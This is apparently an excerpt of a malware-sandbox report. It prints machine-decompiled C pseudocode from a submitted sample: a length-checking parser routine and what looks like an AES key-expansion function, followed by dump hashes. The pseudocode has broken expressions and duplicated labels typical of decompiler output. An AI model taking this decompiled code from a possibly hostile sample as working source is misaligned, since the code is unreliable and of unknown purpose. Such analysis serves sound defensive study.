                    																E0041E6F0( *((intOrPtr*)(_t407 + 0x7c)), _t291);
                    																_t491 =  ==  ? 0xfffffebe : _t491;
                    																_t407 =  *((intOrPtr*)(_t501 + 0x38));
                    															} else {
                    																_push(_t407);
                    																_t293 = E0041E7A2(_t291);
                    																_t407 =  *((intOrPtr*)(_t501 + 0x38));
                    																if(_t293 != _t385) {
                    																	_t491 = 0xfffffebe;
                    																}
                    															}
                    														}
                    													}
                    													if( *((intOrPtr*)(_t407 + 0x1c)) != 0x206) {
                    														goto L114;
                    													} else {
                    														 *(_t501 + 0x60) =  *(_t501 + 0x60) & 0x00000000;
                    														_t386 = _t490 + 0x384;
                    														if( *_t386 != 0) {
                    															if( *((char*)(_t490 + 0x38a)) == 0) {
                    																L107:
                    																if(E0042B020( *_t407, _t501 + 0x64,  *_t386,  *((intOrPtr*)(_t407 + 4))) != 0) {
                    																	L109:
                    																	_t491 = 0xfffffeaa;
                    																	L110:
                    																	if(_t491 == 0 &&  *((char*)(_t490 + 0x38a)) != 0 && ( *(_t490 + 0x310) & 0x00000080) == 0) {
                    																		E0042EA00( *_t386);
                    																		_t491 =  <  ? 0xfffffe66 : _t491;
                    																	}
                    																	goto L114;
                    																}
                    																 *((char*)(_t490 + 0x38a)) = 1;
                    																goto L110;
                    															}
                    															_t290 = E0041DDC5(_t490,  *_t386);
                    															 *((char*)(_t490 + 0x38a)) = 0;
                    															L105:
                    															if(_t290 != 0) {
                    																goto L109;
                    															}
                    															_t407 =  *((intOrPtr*)(_t501 + 0x38));
                    															goto L107;
                    														}
                    														_push(_t386);
                    														_t469 = 0x25;
                    														_t290 = E0041DD3C(_t490, _t469);
                    														goto L105;
                    													}
                    												} else {
                    													 *(_t490 + 0x1f8) = _t491;
                    													goto L133;
                    												}
                    											} else {
                    												goto L133;
                    											}
                    										}
                    										 *(_t501 + 0x4c) =  *(_t501 + 0x4c) & 0x00000000;
                    										_push(_t501 + 0x20);
                    										_push(_t501 + 0x30);
                    										_push( !(( *(_t490 + 0x310) & 0x0000ffff) >> 7) & 1);
                    										_push(_t393);
                    										_t491 = E0041EA07(_t501 + 0x38);
                    										_t501 = _t501 + 0x10;
                    										if(_t491 != 0) {
                    											if(_t491 == 0xffffff74 || _t491 == 0xffffff7c ||  *((intOrPtr*)(_t490 + 0x80)) == 0) {
                    												L69:
                    												 *(_t501 + 0x56) =  *(_t501 + 0x56) | _t385;
                    											} else {
                    												 *(_t501 + 0x56) =  *(_t501 + 0x56) ^ ( *(_t501 + 0x56) >> 0x00000001 ^  *(_t501 + 0x56)) & 1;
                    											}
                    											goto L70;
                    										}
                    										if(( *(_t501 + 0x56) & 0x00000002) == 0) {
                    											 *(_t501 + 0x56) =  *(_t501 + 0x56) & 0x0000fffe;
                    											goto L70;
                    										}
                    										_t491 =  *(_t501 + 0x50);
                    										goto L69;
                    									}
                    									while(_t277 > _t458) {
                    										 *(_t501 + 0x4c) =  *(_t501 + 0x48) - 1;
                    										_push(_t501 + 0x20);
                    										_push(_t501 + 0x30);
                    										_push( !(( *(_t490 + 0x310) & 0x0000ffff) >> 7) & _t458);
                    										_push(_t393);
                    										_t322 = E0041EA07(_t501 + 0x38);
                    										_t501 = _t501 + 0x10;
                    										if(_t322 == 0) {
                    											_t322 = E0041EAE0(_t490, _t501 + 0x30);
                    										}
                    										_push(_t501 + 0x30);
                    										_push(_t322);
                    										_t491 = E0041E857( *((intOrPtr*)( *_t490 + 0x50)), _t490);
                    										_t324 = 0x80;
                    										_t430 =  *(_t490 + 0x310) & 0x00000080;
                    										if(_t430 != 0 && (_t491 == 0xfffffe96 || _t491 == 0xfffffe97)) {
                    											 *(_t490 + 0x1f8) =  *(_t490 + 0x1f8) & 0x00000000;
                    											_t491 = 0;
                    										}
                    										if(_t491 != 0) {
                    											L57:
                    											if(( *(_t490 + 0x310) & _t324) == 0) {
                    												E0041E7F8(_t490, _t491);
                    											}
                    											 *(_t490 + 0x1f8) = _t491;
                    											if( *(_t501 + 0x50) == 0) {
                    												 *(_t501 + 0x50) = _t491;
                    												_t491 = 0;
                    											}
                    											goto L61;
                    										} else {
                    											if(( *( *((intOrPtr*)(_t501 + 0x38)) + 0x36c) & 0x00000010) == 0 || _t430 != 0) {
                    												L61:
                    												_t393 =  *((intOrPtr*)(_t501 + 0x38));
                    												E00428860(_t393);
                    												 *(_t501 + 0x56) =  *(_t501 + 0x56) &  *(_t501 + 0x28);
                    												_t277 =  *(_t501 + 0x48) - 1;
                    												_t458 = 1;
                    												 *(_t501 + 0x48) = _t277;
                    												continue;
                    											} else {
                    												_t387 =  *((intOrPtr*)(_t501 + 0x30));
                    												_t497 =  *(_t501 + 0x4c);
                    												if( *(_t501 + 0x20) != _t491) {
                    													goto L61;
                    												}
                    												 *(_t501 + 0x20) =  *(_t501 + 0x20) & _t491;
                    												_t491 = E0042AC8C( *((intOrPtr*)(_t387 + 4 + _t497 * 8)), 5,  *((intOrPtr*)(_t490 + 0x84)));
                    												if(_t491 < 0) {
                    													goto L133;
                    												}
                    												E00436320( *( *(_t501 + 0x20)),  *((intOrPtr*)(_t387 + _t497 * 8)),  *((intOrPtr*)(_t387 + 4 + _t497 * 8)));
                    												_t478 = _t501 + 0x28;
                    												_t501 = _t501 + 0xc;
                    												_push(0);
                    												_push(2);
                    												_t491 =  ==  ? 0 : E00420D36( *((intOrPtr*)( *_t490 + 0x50)), _t478);
                    												if(_t491 == 0) {
                    													goto L61;
                    												}
                    												_t324 = 0x80;
                    												goto L57;
                    											}
                    										}
                    									}
                    									goto L63;
                    								}
                    							}
                    							if(( *(_t490 + 0x314) & 0x00002000) != 0) {
                    								L38:
                    								if(( *(_t490 + 0x310) & 0x00000030) == 0) {
                    									_t491 = 0xfffffea7;
                    									E0041E7F8(_t490, 0xfffffea7);
                    								}
                    								goto L40;
                    							}
                    							if(( *(_t490 + 0x310) & 0x00000100) == 0) {
                    								goto L40;
                    							}
                    							_t339 = E0041D125( *(_t490 + 0x220) & 0x0000ffff);
                    							_t501 = _t501 + 4;
                    							if(_t339 == 0) {
                    								goto L40;
                    							}
                    							goto L38;
                    						}
                    						L22:
                    						L22:
                    						if(_t496 >= ( *(_t490 + 0x216) & 0x000000ff) || _t496 >= 9) {
                    							_t491 = 0xfffffe90;
                    						} else {
                    							goto L24;
                    						}
                    						goto L133;
                    						L24:
                    						if(_t382 - _t462 + 3 >  *((intOrPtr*)(_t501 + 0x64))) {
                    							goto L10;
                    						}
                    						E0041D0C5(_t382 +  *((intOrPtr*)(_t501 + 0x1c)), _t501 + 0x24);
                    						_t445 =  *(_t501 + 0x24);
                    						_t388 = _t382 + 3;
                    						 *((intOrPtr*)(_t501 + 0x3c)) = _t388;
                    						if(_t445 -  *((intOrPtr*)(_t501 + 0x40)) + _t388 >  *((intOrPtr*)(_t501 + 0x64))) {
                    							goto L10;
                    						}
                    						 *( *((intOrPtr*)(_t501 + 0x30)) + 4 + _t496 * 8) = _t445;
                    						_t498 =  *(_t501 + 0x20);
                    						 *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x34)) +  *(_t501 + 0x48) * 8)) =  *((intOrPtr*)(_t501 + 0x40)) + _t498;
                    						_t382 =  *((intOrPtr*)(_t501 + 0x40)) +  *(_t501 + 0x28);
                    						_t350 = 0xfffffffd;
                    						_t448 =  *((intOrPtr*)(_t501 + 0x1c)) + _t350 -  *(_t501 + 0x24);
                    						 *((intOrPtr*)(_t501 + 0x3c)) = _t382;
                    						 *(_t501 + 0x18) = _t448;
                    						if( *(_t490 + 0x310) < 0x8000) {
                    							L31:
                    							_t496 =  *(_t501 + 0x44) + 1;
                    							 *(_t501 + 0x44) = _t496;
                    							if(_t448 == 0) {
                    								goto L34;
                    							} else {
                    								_t462 =  *((intOrPtr*)(_t501 + 0x40));
                    								goto L22;
                    							}
                    						}
                    						if(_t382 -  *((intOrPtr*)(_t501 + 0x40)) + 2 >  *((intOrPtr*)(_t501 + 0x64))) {
                    							goto L10;
                    						}
                    						E0041D0DF(_t382 + _t498, _t501 + 0x14);
                    						_t493 =  *(_t501 + 0x14) & 0x0000ffff;
                    						_t390 = _t382 + 2;
                    						 *((intOrPtr*)(_t501 + 0x3c)) = _t390;
                    						if(_t493 -  *((intOrPtr*)(_t501 + 0x40)) + _t390 >  *((intOrPtr*)(_t501 + 0x64))) {
                    							goto L10;
                    						}
                    						 *( *((intOrPtr*)(_t501 + 0x34)) + 4 +  *(_t501 + 0x44) * 8) = _t493;
                    						 *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x38)) +  *(_t501 + 0x48) * 8)) =  *((intOrPtr*)(_t501 + 0x40)) + _t498;
                    						 *((intOrPtr*)(_t501 + 0x40)) =  *((intOrPtr*)(_t501 + 0x40)) + _t493;
                    						_t362 = 0xfffffffe;
                    						 *(_t501 + 0x18) =  *(_t501 + 0x18) + _t362 - _t493;
                    						_t491 = E004238C7(_t490,  *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x38)) +  *(_t501 + 0x48) * 8)), _t508,  *( *((intOrPtr*)(_t501 + 0x38)) + 4 +  *(_t501 + 0x48) * 8) & 0x0000ffff, 0xb, 0);
                    						_t501 = _t501 + 0xc;
                    						if(_t491 < 0) {
                    							goto L133;
                    						} else {
                    							_t382 =  *((intOrPtr*)(_t501 + 0x3c));
                    							_t448 =  *(_t501 + 0x18);
                    							goto L31;
                    						}
                    					}
                    					if(_t393 - _t380 + 1 <= _t495) {
                    						_t370 =  *((intOrPtr*)(_t393 +  *((intOrPtr*)(_t501 + 0x1c))));
                    						_t454 = _t393 + 1;
                    						 *(_t501 + 0x14) = _t370;
                    						_t371 = _t370 & 0x000000ff;
                    						 *(_t501 + 0x24) = _t371;
                    						 *((intOrPtr*)(_t501 + 0x3c)) = _t454;
                    						if(_t371 - _t380 + _t454 > _t495) {
                    							goto L10;
                    						}
                    						if((_t459 & 0x00000030) != 0x10 ||  *(_t501 + 0x14) == 0) {
                    							 *((intOrPtr*)(_t501 + 0x3c)) = _t454 +  *(_t501 + 0x24);
                    							_push(0x48);
                    							_t374 = E004328E2();
                    							 *((intOrPtr*)(_t501 + 0x34)) = _t374;
                    							if(_t374 != 0) {
                    								goto L17;
                    							}
                    							goto L16;
                    						} else {
                    							_t491 = 0xfffffe5c;
                    							goto L133;
                    						}
                    					}
                    					goto L10;
                    				}
                    				_t375 = _t260 - _t458;
                    				if(_t375 == 0) {
                    					goto L42;
                    				}
                    				_t376 = _t375 - _t458;
                    				if(_t376 == 0) {
                    					goto L65;
                    				}
                    				_t377 = _t376 - _t458;
                    				if(_t377 == 0) {
                    					_t385 = 1;
                    					goto L73;
                    				}
                    				_t378 = _t377 - _t458;
                    				if(_t378 == 0) {
                    					goto L117;
                    				}
                    				if(_t378 == _t458) {
                    					goto L132;
                    				} else {
                    					_t491 = 0xfffffed3;
                    					goto L133;
                    				}
                    			}

























































                    0x0041eb21
                    0x0041eb25
                    0x0041eb27
                    0x0041eb2e
                    0x0041eb32
                    0x0041eb34
                    0x0041eb3f
                    0x0041eb44
                    0x0041eb48
                    0x0041eb52
                    0x0041eb5a
                    0x0041eb5d
                    0x0041eb5f
                    0x0041eb63
                    0x0041eb69
                    0x0041eb6a
                    0x0041eb6c
                    0x0041eba4
                    0x0041ebb0
                    0x0041ebb7
                    0x0041ec24
                    0x0041ec24
                    0x0041ec27
                    0x0041ec2c
                    0x0041ec32
                    0x0041ec1c
                    0x0041ec1e
                    0x0041f30d
                    0x0041f311
                    0x0041f318
                    0x0041f326
                    0x0041f326
                    0x0041ec39
                    0x0041ec3e
                    0x0041ec42
                    0x0041ec50
                    0x0041ebc2
                    0x0041ebc2
                    0x00000000
                    0x0041ebc2
                    0x0041ec61
                    0x0041ec66
                    0x0041ec6a
                    0x0041ec6d
                    0x0041ec71
                    0x0041ec7b
                    0x00000000
                    0x00000000
                    0x0041ec81
                    0x0041ec8d
                    0x00000000
                    0x00000000
                    0x0041ec93
                    0x0041ec99
                    0x0041edf9
                    0x0041edf9
                    0x0041edfe
                    0x0041ee04
                    0x0041ee4d
                    0x0041ee56
                    0x0041ee5b
                    0x0041ee5d
                    0x0041ee62
                    0x0041ee68
                    0x00000000
                    0x0041ee6e
                    0x0041ee72
                    0x0041ee79
                    0x0041ee7c
                    0x0041ee7d
                    0x0041ee83
                    0x0041ee83
                    0x0041ee89
                    0x0041eff3
                    0x0041eff5
                    0x00000000
                    0x00000000
                    0x0041effb
                    0x0041efff
                    0x0041f006
                    0x0041f008
                    0x0041f00e
                    0x0041f05b
                    0x0041f05f
                    0x0041f069
                    0x0041f070
                    0x0041f075
                    0x0041f25d
                    0x0041f264
                    0x0041f26e
                    0x0041f275
                    0x0041f27a
                    0x0041f27e
                    0x0041f27e
                    0x0041f289
                    0x0041f28a
                    0x0041f296
                    0x0041f298
                    0x0041f2a2
                    0x0041f2a8
                    0x0041f2ba
                    0x0041f2c1
                    0x0041f2c1
                    0x0041f2c5
                    0x0041f2e1
                    0x0041f2e3
                    0x0041f2e3
                    0x0041f2c7
                    0x0041f2ca
                    0x0041f2d0
                    0x0041f2d0
                    0x0041f2d5
                    0x0041f2d5
                    0x0041f2ec
                    0x0041f2f1
                    0x0041f2f7
                    0x0041f2f9
                    0x0041f2ff
                    0x0041f2ff
                    0x0041f303
                    0x0041f30a
                    0x0041f30a
                    0x0041f30a
                    0x00000000
                    0x0041f264
                    0x0041f07b
                    0x0041f08a
                    0x0041f092
                    0x0041f0ac
                    0x0041f0ac
                    0x0041f0af
                    0x0041f0b7
                    0x0041f0d1
                    0x0041f0d1
                    0x0041f0b7
                    0x0041f0da
                    0x0041f0e6
                    0x0041f14e
                    0x0041f0e8
                    0x0041f0ef
                    0x0041f0f1
                    0x0041f0f1
                    0x0041f0ef
                    0x0041f0e6
                    0x0041f155
                    0x0041f167
                    0x0041f174
                    0x0041f176
                    0x0041f17e
                    0x0041f184
                    0x0041f1a5
                    0x0041f1b2
                    0x0041f1b5
                    0x0041f186
                    0x0041f186
                    0x0041f189
                    0x0041f18f
                    0x0041f195
                    0x0041f197
                    0x0041f197
                    0x0041f195
                    0x0041f184
                    0x0041f17e
                    0x0041f1c0
                    0x00000000
                    0x0041f1c6
                    0x0041f1c6
                    0x0041f1cb
                    0x0041f1d4
                    0x0041f1ea
                    0x0041f205
                    0x0041f219
                    0x0041f226
                    0x0041f226
                    0x0041f22b
                    0x0041f22d
                    0x0041f247
                    0x0041f25a
                    0x0041f25a
                    0x00000000
                    0x0041f22d
                    0x0041f21e
                    0x00000000
                    0x0041f21e
                    0x0041f1f0
                    0x0041f1f5
                    0x0041f1fc
                    0x0041f1ff
                    0x00000000
                    0x00000000
                    0x0041f201
                    0x00000000
                    0x0041f201
                    0x0041f1d6
                    0x0041f1d9
                    0x0041f1dc
                    0x00000000
                    0x0041f1dc
                    0x0041f157
                    0x0041f157
                    0x00000000
                    0x0041f157
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041f05f
                    0x0041f010
                    0x0041f019
                    0x0041f01e
                    0x0041f031
                    0x0041f032
                    0x0041f03a
                    0x0041f03c
                    0x0041f041
                    0x0041f10d
                    0x0041f056
                    0x0041f056
                    0x0041f12c
                    0x0041f138
                    0x0041f138
                    0x00000000
                    0x0041f10d
                    0x0041f04c
                    0x0041f0fd
                    0x00000000
                    0x0041f0fd
                    0x0041f052
                    0x00000000
                    0x0041f052
                    0x0041efeb
                    0x0041ee99
                    0x0041eea1
                    0x0041eea6
                    0x0041eeb9
                    0x0041eeba
                    0x0041eebd
                    0x0041eec2
                    0x0041eec7
                    0x0041eecf
                    0x0041eecf
                    0x0041eeda
                    0x0041eedd
                    0x0041eeef
                    0x0041eef1
                    0x0041eef6
                    0x0041eef9
                    0x0041ef0b
                    0x0041ef12
                    0x0041ef12
                    0x0041ef16
                    0x0041efa9
                    0x0041efaf
                    0x0041efb5
                    0x0041efb5
                    0x0041efbf
                    0x0041efc5
                    0x0041efc7
                    0x0041efcb
                    0x0041efcb
                    0x00000000
                    0x0041ef1c
                    0x0041ef27
                    0x0041efcd
                    0x0041efcd
                    0x0041efd1
                    0x0041efdc
                    0x0041efe5
                    0x0041efe6
                    0x0041efe7
                    0x00000000
                    0x0041ef36
                    0x0041ef36
                    0x0041ef3a
                    0x0041ef42
                    0x00000000
                    0x00000000
                    0x0041ef56
                    0x0041ef61
                    0x0041ef67
                    0x00000000
                    0x00000000
                    0x0041ef7a
                    0x0041ef81
                    0x0041ef85
                    0x0041ef8b
                    0x0041ef8d
                    0x0041ef9f
                    0x0041efa4
                    0x00000000
                    0x00000000
                    0x0041efa6
                    0x00000000
                    0x0041efa6
                    0x0041ef27
                    0x0041ef16
                    0x00000000
                    0x0041efeb
                    0x0041ee68
                    0x0041ee12
                    0x0041ee36
                    0x0041ee3d
                    0x0041ee3f
                    0x0041ee48
                    0x0041ee48
                    0x00000000
                    0x0041ee3d
                    0x0041ee20
                    0x00000000
                    0x00000000
                    0x0041ee2a
                    0x0041ee2f
                    0x0041ee34
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041ee34
                    0x00000000
                    0x0041ec9f
                    0x0041eca8
                    0x0041edef
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041ecb7
                    0x0041ecc2
                    0x00000000
                    0x00000000
                    0x0041ecd3
                    0x0041ecd8
                    0x0041ecdc
                    0x0041ece1
                    0x0041ecef
                    0x00000000
                    0x00000000
                    0x0041ecfb
                    0x0041ed0b
                    0x0041ed11
                    0x0041ed1c
                    0x0041ed20
                    0x0041ed25
                    0x0041ed27
                    0x0041ed30
                    0x0041ed3b
                    0x0041edd9
                    0x0041eddd
                    0x0041edde
                    0x0041ede4
                    0x00000000
                    0x0041ede6
                    0x0041ede6
                    0x00000000
                    0x0041ede6
                    0x0041ede4
                    0x0041ed4e
                    0x00000000
                    0x00000000
                    0x0041ed5b
                    0x0041ed60
                    0x0041ed65
                    0x0041ed6a
                    0x0041ed78
                    0x00000000
                    0x00000000
                    0x0041ed88
                    0x0041ed9a
                    0x0041eda5
                    0x0041eda9
                    0x0041edac
                    0x0041edc4
                    0x0041edc6
                    0x0041edcb
                    0x00000000
                    0x0041edd1
                    0x0041edd1
                    0x0041edd5
                    0x00000000
                    0x0041edd5
                    0x0041edcb
                    0x0041ebc0
                    0x0041ebd0
                    0x0041ebd3
                    0x0041ebd4
                    0x0041ebd8
                    0x0041ebdb
                    0x0041ebe3
                    0x0041ebe9
                    0x00000000
                    0x00000000
                    0x0041ebf1
                    0x0041ec08
                    0x0041ec0c
                    0x0041ec0f
                    0x0041ec14
                    0x0041ec1a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041ebfa
                    0x0041ebfa
                    0x00000000
                    0x0041ebfa
                    0x0041ebf1
                    0x00000000
                    0x0041ebc0
                    0x0041eb6e
                    0x0041eb70
                    0x00000000
                    0x00000000
                    0x0041eb76
                    0x0041eb78
                    0x00000000
                    0x00000000
                    0x0041eb7e
                    0x0041eb80
                    0x0041eb9e
                    0x00000000
                    0x0041eb9e
                    0x0041eb82
                    0x0041eb84
                    0x00000000
                    0x00000000
                    0x0041eb8c
                    0x00000000
                    0x0041eb92
                    0x0041eb92
                    0x00000000
                    0x0041eb92

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 137749715c6862c255e0f5339e17da80f3cbc8536609bad9579cdd039154c7c0
                    • Instruction ID: 7eb7c8aec25f10884d969b24d62efb344c65d2a23d573b063e13ba40b7b4e0ac
                    • Opcode Fuzzy Hash: 137749715c6862c255e0f5339e17da80f3cbc8536609bad9579cdd039154c7c0
                    • Instruction Fuzzy Hash: 5A32C2756087459BC715CF29C4807ABB7E1BF84318F040A2EFCA587392D779DD868B8A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 36%
                    			E00426DBB(void* __ebx, signed int* __ecx, void* __edx, void* __esi) {
                    				void* __edi;
                    				signed int _t250;
                    				signed int _t267;
                    				void* _t270;
                    				signed char _t318;
                    				signed int _t334;
                    				signed int _t355;
                    				signed int _t373;
                    				signed int _t391;
                    				signed int _t410;
                    				signed int _t418;
                    				signed int _t430;
                    				signed int _t432;
                    				signed int _t436;
                    				intOrPtr _t437;
                    				signed char _t460;
                    				signed int _t464;
                    				signed int _t466;
                    				signed int _t469;
                    				signed int _t472;
                    				signed int _t474;
                    				signed int _t475;
                    				signed int _t478;
                    				signed int _t482;
                    				signed int _t488;
                    				intOrPtr _t489;
                    				signed char* _t499;
                    				signed int _t506;
                    				signed int _t512;
                    				signed int _t519;
                    				signed int _t525;
                    				signed int _t531;
                    				unsigned int _t533;
                    				signed int* _t534;
                    				void* _t536;
                    				void* _t537;
                    				signed char* _t538;
                    				signed int* _t540;
                    				signed int* _t541;
                    				signed int* _t544;
                    				void* _t545;
                    				intOrPtr _t546;
                    				void* _t548;
                    				void* _t549;
                    				void* _t550;
                    				signed char* _t555;
                    				void* _t559;
                    				void* _t560;
                    
                    				_push(__ecx);
                    				_t533 =  *(_t559 + 0x18);
                    				_t544 = __ecx;
                    				 *((intOrPtr*)(_t559 + 0x10)) = __ecx;
                    				 *(__ecx + 0xf4) = _t533;
                    				 *((intOrPtr*)(__ecx + 0xf0)) = (_t533 >> 2) + 6;
                    				E00436320(__ecx, __edx, _t533);
                    				E00426729(_t544, _t544, _t533);
                    				_t560 = _t559 + 0x10;
                    				if(_t533 == 0x10) {
                    					_t482 = _t544[3];
                    					_t98 =  &(_t544[1]); // 0xb4
                    					_t534 = _t98;
                    					_t430 = ( *(0x467f00 + (_t482 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x467b00 + (_t482 >> 0x18) * 4) & 0x000000ff ^  *(0x468300 + (_t482 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467700 + (_t482 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
                    					_t544[4] = _t430;
                    					_t250 =  *_t534 ^ _t430;
                    					_t432 = _t544[2] ^ _t250;
                    					_t544[5] = _t250;
                    					_t544[6] = _t432;
                    					_t544[7] = _t432 ^ _t482;
                    					_t545 = 4;
                    					do {
                    						_t534 =  &(_t534[4]);
                    						_t434 = _t534[2];
                    						_t122 = _t545 + 0x4666d8; // 0x2000000
                    						_t545 = _t545 + 4;
                    						_t488 =  *(0x467b00 + (_t534[2] >> 0x18) * 4) & 0x000000ff ^  *(0x468300 + (_t534[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467f00 + (_t434 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x467700 + (_t434 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t534 - 4);
                    						_t534[3] = _t488;
                    						_t267 =  *_t534 ^ _t488;
                    						_t534[4] = _t267;
                    						_t436 = _t534[1] ^ _t267;
                    						_t534[5] = _t436;
                    						_t534[6] = _t534[2] ^ _t436;
                    					} while (_t545 != 0x28);
                    					goto L12;
                    				} else {
                    					if(_t533 == 0x18) {
                    						_t462 = _t544[5];
                    						_t58 =  &(_t544[0xa]); // 0xd8
                    						_t540 = _t58;
                    						_t506 = ( *(0x467f00 + (_t544[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x467b00 + (_t462 >> 0x18) * 4) & 0x000000ff ^  *(0x468300 + (_t462 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467700 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
                    						_t334 = _t544[1] ^ _t506;
                    						_t544[6] = _t506;
                    						_t544[7] = _t334;
                    						_t464 = _t544[2] ^ _t334;
                    						_t544[8] = _t464;
                    						_t544[9] = _t544[3] ^ _t464;
                    						_t549 = 4;
                    						do {
                    							_t466 =  *(_t540 - 0x18) ^  *(_t540 - 4);
                    							 *_t540 = _t466;
                    							_t540[1] =  *(_t540 - 0x14) ^ _t466;
                    							_t540 =  &(_t540[6]);
                    							_t467 =  *(_t540 - 0x14);
                    							_t88 = _t549 + 0x4666d8; // 0x2000000
                    							_t549 = _t549 + 4;
                    							_t512 =  *(0x467b00 + ( *(_t540 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x468300 + ( *(_t540 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467f00 + (_t467 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x467700 + (_t467 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t540 - 0x28);
                    							 *(_t540 - 0x10) = _t512;
                    							_t355 =  *(_t540 - 0x24) ^ _t512;
                    							 *(_t540 - 0xc) = _t355;
                    							_t469 =  *(_t540 - 0x20) ^ _t355;
                    							 *(_t540 - 8) = _t469;
                    							 *(_t540 - 4) =  *(_t540 - 0x1c) ^ _t469;
                    						} while (_t549 != 0x20);
                    						goto L12;
                    					} else {
                    						if(_t533 == 0x20) {
                    							_t470 = _t544[7];
                    							_t6 =  &(_t544[0xc]); // 0xe0
                    							_t541 = _t6;
                    							_t519 = ( *(0x467f00 + (_t544[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x467b00 + (_t470 >> 0x18) * 4) & 0x000000ff ^  *(0x468300 + (_t470 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467700 + (_t470 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
                    							_t373 = _t544[1] ^ _t519;
                    							_t544[8] = _t519;
                    							_t544[9] = _t373;
                    							_t472 = _t544[2] ^ _t373;
                    							_t544[0xa] = _t472;
                    							_t544[0xb] = _t544[3] ^ _t472;
                    							_t550 = 4;
                    							do {
                    								_t473 =  *(_t541 - 4);
                    								_t474 =  *(_t541 - 0x18);
                    								_t525 =  *(0x468300 + ( *(_t541 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467f00 + ( *(_t541 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x467700 + (_t473 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x467b00 + (_t473 & 0x000000ff) * 4) & 0x000000ff ^  *(_t541 - 0x20);
                    								_t391 =  *(_t541 - 0x1c) ^ _t525;
                    								 *_t541 = _t525;
                    								_t541[1] = _t391;
                    								_t541 =  &(_t541[8]);
                    								_t475 = _t474 ^ _t391;
                    								 *(_t541 - 0x18) = _t475;
                    								 *(_t541 - 0x14) =  *(_t541 - 0x34) ^ _t475;
                    								_t476 =  *(_t541 - 0x14);
                    								_t48 = _t550 + 0x4666d8; // 0x2000000
                    								_t550 = _t550 + 4;
                    								_t531 =  *(0x467b00 + ( *(_t541 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x468300 + ( *(_t541 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x467f00 + (_t476 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x467700 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *(_t541 - 0x30);
                    								 *(_t541 - 0x10) = _t531;
                    								_t410 =  *(_t541 - 0x2c) ^ _t531;
                    								 *(_t541 - 0xc) = _t410;
                    								_t478 =  *(_t541 - 0x28) ^ _t410;
                    								 *(_t541 - 8) = _t478;
                    								 *(_t541 - 4) =  *(_t541 - 0x24) ^ _t478;
                    							} while (_t550 != 0x1c);
                    							L12:
                    							_t546 =  *((intOrPtr*)(_t560 + 0x10));
                    							_t536 = 1;
                    							if( *((intOrPtr*)(_t560 + 0x20)) == 1) {
                    								_t555 = _t546 + 8;
                    								_t418 =  *(_t546 + 0xf0) << 2;
                    								if(_t418 != 0) {
                    									_t134 = _t418 + 2; // 0x2
                    									_t538 = _t555;
                    									_t499 = _t546 + _t134 * 4;
                    									_t548 = 0;
                    									do {
                    										_t548 = _t548 + 4;
                    										_t418 = _t418 - 4;
                    										 *((intOrPtr*)(_t538 - 8)) =  *((intOrPtr*)(_t499 - 8));
                    										 *((intOrPtr*)(_t499 - 8)) =  *((intOrPtr*)(_t538 - 8));
                    										 *((intOrPtr*)(_t538 - 4)) =  *((intOrPtr*)(_t499 - 4));
                    										 *((intOrPtr*)(_t499 - 4)) =  *((intOrPtr*)(_t538 - 4));
                    										_t460 =  *_t538;
                    										 *_t538 =  *_t499;
                    										_t538 =  &(_t538[0x10]);
                    										_t318 = _t499[4];
                    										 *_t499 = _t460;
                    										_t499 = _t499 - 0x10;
                    										 *(_t538 - 0xc) = _t318;
                    										_t499[0x14] =  *(_t538 - 0xc);
                    									} while (_t548 < _t418);
                    									_t546 =  *((intOrPtr*)(_t560 + 0x10));
                    									_t536 = 1;
                    								}
                    								if( *(_t546 + 0xf0) > _t536) {
                    									do {
                    										_t555 =  &(_t555[0x10]);
                    										_t490 =  *(_t555 - 8);
                    										_t492 =  *(_t555 - 4);
